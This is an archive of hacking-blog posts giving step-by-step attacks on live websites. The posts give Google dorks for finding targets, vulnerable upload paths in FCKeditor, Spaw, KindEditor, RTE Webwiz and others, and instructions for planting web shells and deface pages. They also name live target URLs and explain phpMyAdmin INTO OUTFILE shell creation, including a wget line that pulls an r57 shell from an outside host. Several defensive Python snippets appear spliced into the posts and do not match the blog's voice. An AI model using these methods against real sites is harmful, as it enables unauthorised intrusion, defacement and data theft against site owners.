Showing posts with the label website hack.

Monday, 20 June 2016

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey guys. Today I found some fresh private Israel 0day exploits, so I thought of sharing them with you all. So let's start.
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

After you upload your ASP or PHP shell, check the page source and you will see the URL of your shell, for example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
# Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
3). Third 0day Upload Blind Sql Injection

Target these with Havij or manually; the admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So that's it, guys. We have seen Israel Private 0Day Shell Upload Exploits ASP|PHP. Share it :)

How to get XSS Pop Up on any Site | Javascript Injection

Hello guys! Today we are going to discuss JavaScript injection :P. With it you can get an XSS pop-up on any site; all you need to do is paste some JavaScript vectors into the console prompt of your browser.

With this you can prank your friends just by pasting JavaScript into the console on popular sites like Facebook, taking screenshots and simply sending them to your friends :P OK, so here we start.

JavaScript Injection: Produce an XSS Pop-Up on any Site. Basically, it's just for fun, but sometimes you can get the cookies of a vulnerable website by using JavaScript injection. OK, so let's start.

1). For Chrome, open the console with Ctrl+Shift+I and paste any of these JavaScript snippets into the console box to get a pop-up :)

2). Do the same for Firefox :) Ctrl+Shift+I :)

To Alert and Changing Title on Website by Javascript(XSS)

just enter the below javascript in console :)
Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");



Getting Cookies By javascripts(XSS)

You can also get cookies by javascript(XSS).. just use below scripts :)
alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie); 
What are you waiting for? Just go ahead and prank your friends :P
So that's it for now. If you really enjoyed reading, do share and don't forget to leave your feedback :)

Thursday, 22 January 2015

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! Today I'm gonna share an HTML Injection vulnerability. This works mostly on Thailand web pages :). So let's start.

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site and replace everything after yoursite.com/ with any one of the following [Exploit]:
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/



Saturday, 19 April 2014

Simple Upload 53 Shell Upload Vulnerability

This vulnerability allows an attacker to upload a shell. A web application vulnerability in the "Simple Upload 53" PHP file allows an attacker to upload backdoor shell code to your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell, you can hack/deface the site.
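
A server-side check that closes the ".php.jpg" double-extension hole described above. This is an added example, not code from Simple Upload 53 or from the original post; the allow-list, the function name and the sample uploads are assumptions.

```python
import os
import re
import secrets

# Assumed allow-list for an image-only upload form (not taken from Simple Upload 53).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Extensions a web server may pass to an interpreter.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx",
              "asa", "cer", "jsp", "cgi", "pl", "py", "sh", "shtml", "htaccess"}
# Leading bytes expected for each allowed type.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SEGMENT_RE = re.compile(r"[a-z0-9]+")


def check_upload(client_name, content):
    """Return (ok, reason, stored_name); stored_name is generated server-side."""
    if re.search(r"[\x00-\x1f]", client_name):
        return False, "control character in filename", None
    # Keep only the final path component of whatever the client sent.
    base = os.path.basename(client_name.replace("\\", "/")).lower()
    segments = base.split(".")
    if len(segments) < 2:
        return False, "no extension", None
    extensions = segments[1:]
    # Check EVERY dot-separated segment, not only the last one: a server that
    # maps handlers by any extension in the name (for example Apache mod_mime
    # with AddHandler) can still run "shell.php.jpg" as PHP.
    for seg in extensions:
        if not SEGMENT_RE.fullmatch(seg):
            return False, "malformed extension", None
        if seg in SCRIPT_EXT:
            return False, "script extension ." + seg, None
    final = extensions[-1]
    if final not in ALLOWED_EXT:
        return False, "extension ." + final + " not allowed", None
    if not content.startswith(MAGIC[final]):
        return False, "content does not match extension", None
    # Never reuse the client's name on disk: random stem, one validated extension.
    return True, "ok", secrets.token_hex(16) + "." + final


if __name__ == "__main__":
    # Constructed sample uploads.
    samples = [
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("shell.php.gif", b"GIF89a"),
        ("holiday.JPG", b"\xff\xd8\xff\xe0 image data"),
        ("photo.png", b"not an image"),
    ]
    for name, body in samples:
        print(name, "->", check_upload(name, body))
```

Pair this with an upload directory in which the web server never executes scripts; name and magic-byte checks are not a substitute for that.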

WebTester File Upload Vulnerability



Hello Reader, hope you all are enjoying my posts. Here I'm back with a new file upload vulnerability called WebTester File Upload Vulnerability. So let's start.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). GO to google and type the following dork..
Google Dork : inurl:go.php?testID= 
For More Results Use your Brain and create your own Dork..
Exploit :http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html , txt or jpg files



3). To find your uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting our tutorials because you have no knowledge about web hacking and you want to learn web hacking. So today I decided to write this tutorial for noobs.

In this tutorial we are going to learn about the IIS web hacking exploit, the easiest way to hack for noobs.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this exploit an attacker can upload a shell, deface the web site, delete data, etc., and can do everything without login :D. Yeah, you heard right. I know you all are getting excited, so let's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork; be creative, use your mind and create your own unique dork :)

If you are unable to find one, don't worry. See the end of the tutorial, I have posted some sites :)

2). After finding a vulnerable site, click on the Start button and open "RUN"


3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a folder will open named "Web Folders"

Now right-click in that folder, then "New" and then "Web Folder".


5). Now paste the URL of the vulnerable site and click Next.


6). Now it will ask you to give a name for that Web Folder. Leave it as it is and click Finish.


7). Congratulations! Now you are in the web site. If you want to upload a shell, copy your Shell.php into that folder and your shell will be uploaded to the path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some sites for practicing ....

Soon I will post a list of sites vulnerable to the IIS exploit.
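
The Web Folders client used in the steps above speaks WebDAV, so a successful upload appears in the IIS log as a write method (PUT, MKCOL, MOVE) answered with a 2xx status for an anonymous user. The following detection is an added example, not part of the original post: it assumes W3C extended logging with the fields named in the `#Fields:` header, and the log lines are constructed.

```python
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}

# Constructed IIS W3C extended log (documentation IP ranges, made-up requests).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2014-04-19 08:01:10 192.0.2.10 GET /index.htm - 80 - 198.51.100.7 Mozilla/5.0 200 0 0
2014-04-19 08:02:31 192.0.2.10 PROPFIND / - 80 - 203.0.113.5 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
2014-04-19 08:02:40 192.0.2.10 PUT /shell.php - 80 - 203.0.113.5 Microsoft-WebDAV-MiniRedir/5.1.2600 201 0 0
2014-04-19 08:02:55 192.0.2.10 GET /shell.php - 80 - 203.0.113.5 Mozilla/5.0 200 0 0
2014-04-19 08:03:02 192.0.2.10 PUT /docs/report.doc - 80 alice 198.51.100.20 Microsoft-WebDAV-MiniRedir/5.1.2600 201 0 0
2014-04-19 08:04:00 192.0.2.10 PUT /x.txt - 80 - 203.0.113.9 Mozilla/5.0 403 0 0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in '#Fields:'."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def anonymous_writes(text):
    """Successful WebDAV writes by unauthenticated clients, oldest first."""
    records = list(parse_w3c(text))
    hits = []
    for i, rec in enumerate(records):
        if (rec.get("cs-method", "").upper() in WRITE_METHODS
                and rec.get("cs-username") == "-"          # no authenticated user
                and rec.get("sc-status", "").startswith("2")):
            # Did the same client request the file it had just written?
            requested = any(
                later.get("c-ip") == rec.get("c-ip")
                and later.get("cs-uri-stem") == rec.get("cs-uri-stem")
                and later.get("cs-method") in ("GET", "POST")
                for later in records[i + 1:])
            hits.append({
                "when": rec["date"] + " " + rec["time"],
                "client": rec["c-ip"],
                "method": rec["cs-method"],
                "uri": rec["cs-uri-stem"],
                "status": rec["sc-status"],
                "requested_after": requested,
            })
    return hits


if __name__ == "__main__":
    for hit in anonymous_writes(SAMPLE_LOG):
        print(hit)
```

If the site does not need WebDAV, disabling it in IIS removes this path; where it is needed, require authentication and deny write access to anonymous users.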

Tuesday, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a kind of FCKeditor remote file upload vulnerability.
With this vulnerability an attacker can upload a shell, deface page or any file to a website without the admin username and password.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the url after site.com to the Exploitable target..For Example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and upload your deface, shell or file. You can upload .html, .php, .jpg and .txt formats here.



To view your uploaded file go here : http://website/patch/main/upload/your file here 

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html


Encodable Shell File Upload Vulnerability

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork
Dork: "intext:File Upload by Encodable"
It comes back with 166,000 results, but some results are fake and may be malware.
So pick real ones only: you will see the title "Upload a file" in the search results :)
Click only the sites that come with the "Upload a file" title.


2). After clicking the link you'll get an upload form.


3). You'll see some options in this form like name, description, email, etc.
Type anything in these boxes but add an email in the email box; don't use your own,
put one like billy@microsoft.com , admin@nasa.gov etc :P

4). Now choose your file and upload it :)

5). After clicking on the upload button a pop-up will open. Don't close it, it will close automatically
after uploading the file.

6). On some sites you'll get your uploaded file link after uploading to the website,
and if you did not find it then try these URLs
/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi


Sunday, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I posted about how to get access to phpMyAdmin without login through Google dorks. As I promised, I will post about how to deface using phpMyAdmin. So here it is, let's start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First login in to mysql. Or you can use these dorks also CLICK HERE.



2). Now click 'Show MySQL system variables', then 'SQL'. Now you can run SQL commands, like create db, delete tables or whatever. We want to upload a shell, so let's move on to it.



3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now the cmd line is here: http://site.com/cmd.php. Let's run the command to get the shell: wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. That's all, then we have the shell on the site!
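
The `SELECT ... INTO OUTFILE` step above leaves a clear trace when the MySQL general query log is enabled. The scanner below is an added example, not part of the original post: the web-root prefixes are assumptions, and the log lines are constructed in the layout of the general query log (timestamp, connection id and command, statement, separated by tabs).

```python
import re

# INTO OUTFILE / INTO DUMPFILE followed by a quoted path.
OUTFILE_RE = re.compile(r"""\bINTO\s+(OUTFILE|DUMPFILE)\s+(['"])(.+?)\2""", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".cgi")
# Assumed web roots for this example; adjust to the hosts being monitored.
WEB_ROOTS = ("/var/www/", "/srv/www/", "/usr/share/nginx/", "c:/inetpub/", "c:/xampp/htdocs/")

# Constructed general-query-log lines (no real hosts or payloads).
SAMPLE_LOG = (
    "2014-04-13T09:58:02.100200Z\t   41 Connect\tpma@localhost on  using Socket\n"
    "2014-04-13T09:58:07.512000Z\t   41 Query\tSELECT * FROM shop.orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'\n"
    "2014-04-13T10:01:44.003100Z\t   41 Query\tSELECT \"placeholder\" INTO OUTFILE \"/var/www/html/cmd.php\"\n"
    "2014-04-13T10:02:10.440000Z\t   42 Query\tselect 1 into dumpfile 'C:/xampp/htdocs/up/x.txt'\n"
)


def thread_id(line):
    """Connection id from 'timestamp<TAB>  id Command<TAB>statement', or None."""
    cols = line.split("\t")
    if len(cols) >= 2:
        head = cols[1].split()
        if head and head[0].isdigit():
            return head[0]
    return None


def classify(path):
    """Reasons a file written by the database server deserves an alert."""
    p = path.replace("\\", "/").lower()
    reasons = []
    if p.endswith(SCRIPT_EXT):
        reasons.append("script extension")
    if p.startswith(WEB_ROOTS):
        reasons.append("inside web root")
    return reasons


def scan(log_text):
    """Return one finding per statement that writes a file somewhere suspicious."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        reasons = classify(m.group(3))
        if reasons:  # exports to a dedicated data directory are not flagged
            findings.append({"line": lineno, "thread": thread_id(line),
                             "path": m.group(3), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Setting `secure_file_priv` to a directory outside the web root (or to NULL) and revoking the FILE privilege from application accounts blocks the statement itself, so the log rule then only has to catch misconfigured hosts.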



Saturday, 12 April 2014

PhpmyAdmin Exploit with Google Dorks




Hello Reader! Today I'm going to show you how to exploit phpMyAdmin with Google dorks. You don't need to do anything, no login, nothing: just put in the dork and open any site and you will go directly to phpMyAdmin :). So let's start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.
Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 results. So now you can guess how many vulnerable sites are there :D. Open any site and you will be redirected to phpMyAdmin :D

This dork bypasses the admin username and password and takes you directly to the information schema tables to get data, and you can delete data.

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...

Hack Website using Android Phone - Droidsqli



Hello guys, today we talk about how to hack a website using your Android phone. We know that 70% of websites in the world are hacked by using SQL injection. To automate SQL injection we need a tool or OS: BackTrack, Havij, Kali, etc. But now you can attack a site using your Android mobile phones and tablets and hack a website using an Android app called DroidSQLi.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Only you need 3 things:-
1). SQL Vulnerable site:- Learn to find Vuln sites
2). android mobile
3). Droidsqli tool:- Download Here

What is DroidSQLi?
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.


Download(MediaFire):-
Password:- hackers-store.blogspot.com


How to use it?
It's pretty simple actually, because the whole process is automated here.
All you need to do is find a vulnerable URL, put it in Target URL and touch Inject.
You will get the database and all server info.

DroidSQLi supports the following injection techniques:

  • Time based injection
  • Blind injection
  • Error based injection
  • Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods..! :)


Know more about SqlInjection ..
I am sure you will enjoy using this tool. Have fun and thanks again.

Friday, 11 April 2014

0Day Smokybyte SQL Injection Vulnerability 2016



[~] Exploit Title: Smokybyte SQL Injection Vulnerability
[~] Google Dork: intext:"Site by Smokybyte"
[~] Date: 08/04/2014
[~] Exploit Author: Tw-Root [ RedKit ]
[~] Tested on: Windows 7 and 8

Updated! 2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.
[+] SQLi Exploit Http://WebSite.Com/[path]/***.php?id=[SQLi]
[+] Demohttp://www.gcircuit.com/gallery-de.php?id=[SQLi]


Tuesday, 01 April 2014

HACK Website with RTE Webwiz Vulnerability | File Shell upload


Guys, again I'm here with a new web vulnerability called HACK Website with RTE Webwiz Vulnerability | File Shell upload.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .So Lets start..

Follow The Instructions:-

1). Exploits:-
  • site.com/rte/RTE_popup_file_atch.asp 
  • site.com/admin/RTE_popup_file_atch.asp
2). Go to google and type one of the following dorks.

  • inurl:rte/my_documents/my_files
  • inurl:/my_documents/my_files/ 

3). Open any site ..say

site.com/rte/my_documents/my_files/

4). Now replace every thing after site.com with
 rte/RTE_popup_file_atch.asp 
so it will look like-
site.com/rte/RTE_popup_file_atch.asp 

5). Open it and upload your shell or deface


6). Now click on the upload button and after that you will get the path to your uploaded file in the FILE URL box



Happy hacking.. Only for Educational Purposes..!

Thursday, 27 March 2014

Spaw Shell Upload Vulnerability

Hello friends, today I'm going to share another shell upload vulnerability with you all, called Spaw Shell Upload Vulnerability.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)
  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"
2). You will get lots of results. Open any site..
For Example i got :- example.com/spaw2/dialogs/
3). Now replace spaw2/dialogs/ with
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  So now our url will look like this :-
example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4). Now open the site and it will look like this->



5). Now upload your deface page.. :)

Happy hacking. Only for educational purposes.


Saturday, 15 March 2014

Testing Image Shell and Deface Upload Vulnerability


In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:


1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any website from the search results. Find the upload option in the bottom left corner.





4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!


Friday, 14 March 2014

File Thingie Shell Upload Exploit Vulnerability


This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)
Google Dork : inurl:ft2.php intext:upload

2). After searching the above dork, you will get websites vulnerable to this.

3). Select any website, upload your deface or shell there.


4). To view your deface or shell, just click on your file name after its uploaded.


Happy hacking. Only for educational purposes!


Monday, 10 March 2014

File upload vulnerability


1). Go to Google.com and type given below dork..
 allinurl: /cgi-bin/filechucker.cgi



2). Choose a site having title like “Upload a file”,

3). Fill all the fields and upload your deface page or shell..! 
4). It's uploaded :D You just hacked a site!!
As said above, now we just have to upload our deface page here. The uploaded file's URL is given as in the example; if it is not given, you can find your uploaded file at:
example.com/upload/files     or
example.com/upload/userfiles
Here we have uploaded our deface page...


Only for Educational purposes..!!

Tutorial on Defacing with KindEditor Vulnerability



Note==>Tutorial is only for Educational purpose and Hackers Store claims no responsibility on how you use it...

Follow The Steps==>


STEP 1: Go to http://www.google.com/

STEP 2: Copy and Paste this dork

inurl:examples/uploadbutton.html

STEP 3:
 Choose any site target, then put this exploit behind the site url and enter

/kindeditor/examples/uploadbutton.html

Examples: www.sitetarget.com/kindeditor/examples/uploadbutton.html

STEP 4: After putting in the exploit, you will see the 'upload button'. Click the 'upload button' and choose your deface page.

STEP 5: If your deface page file is successfully uploaded, copy the link given beside the 'upload button' and paste it behind the site URL.



Examples: www.sitetarget.com/(url given)
It's just for educational purposes!


Thursday, 04 October 2012

View any sites in lots of effects

Hello friends, Today in this article I will tell you about How to view any site or add many effects to any site. Yesterday While surfing the net I found this. So I thought of sharing this.

Follow The Steps :---

STEP 1. First Go to addeffects.net.

STEP 2. Then type the url of the site which you want to add effects. Look at the picture below.




STEP 3. Then Click on GO! Button.

STEP 4. Then you will be redirected to a new page . And you can see the picture given below in effect.


STEP 5. To change the effect, click on the drop-down menu on the top left of the header. addeffects.net provides more than 130+ effects.

Monday, 24 September 2012

SQL Poison : How to find Vulnerable sites


The Sql Poizon tool includes PHP, ASP, RFI and LFI dorks. Using this tool you can find vulnerable sites, such as SQL-vulnerable sites, and you can also find vulnerable sites by country. You can hack SQL-vulnerable sites using the Sql Poizon tool, and you can also browse the sites using this tool.

Steps:-

1)  First download SQL Poizon software.

2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and you will get the following window.


3) Once you have opened it, you will have to select a dork. I am using a PHP dork in this example. After you have selected the desired dork, press Scan and it will show the results in the Result Panel.


4) Now you have to send the results to the Sqli Crawler. You can do this by right-clicking in the Results Panel and selecting "Send to Sqli Crawler -> All"


5) Now the Sqli Crawler tab will open and all you have to do is press Crawl, and it will check if the website is really vulnerable to SQL injection.


6) Now you have to press Export Results and place it somewhere where you can open it later for further exploitation.
